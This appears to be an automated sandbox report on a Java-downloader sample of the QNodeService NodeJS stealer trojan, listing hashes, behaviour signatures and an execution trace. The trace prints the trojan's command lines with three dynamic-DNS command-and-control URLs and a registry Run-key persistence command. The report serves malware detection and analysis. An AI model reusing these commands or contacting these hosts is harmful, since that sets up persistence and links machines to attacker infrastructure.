Analysis
-
max time kernel
128s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 09:04
General
-
Target
LOI 1000MT.jar
-
Size
12KB
-
MD5
f5f8a528c5825a1fa032327e128c5320
-
SHA1
b43c86e9d2f3cce0766257e44122fe2216365b05
-
SHA256
dcb9f8cbe1da85545179a3c9a0f6c84f9ad0c4612d2e4ae6b4320ee35d041396
-
SHA512
01db263883a1b1da27963eb574fd4d05f0c1283f8d2b44b65cd4a876eb36b03d782e8e1fd6c422bdd1097802e36fd8aef91e01ade1ea540f4e5c3b9ff034f015
Score
10/10
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
-
QNodeService NodeJS Trojan 1 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Adds Run entry to start application 2 TTPs 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
-
Loads dropped DLL 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\LOI 1000MT.jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://classof1996.duckdns.org --central-base-url https://classof1996.spdns.org --central-base-url https://classof1996.theworkpc.com2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1efed896" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1efed896.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1efed896" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1efed896.cmd\""4⤵
- Adds Run entry to start application
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://classof1996.duckdns.org --central-base-url https://classof1996.spdns.org --central-base-url https://classof1996.theworkpc.com3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
-
Filesize
4KB
-
-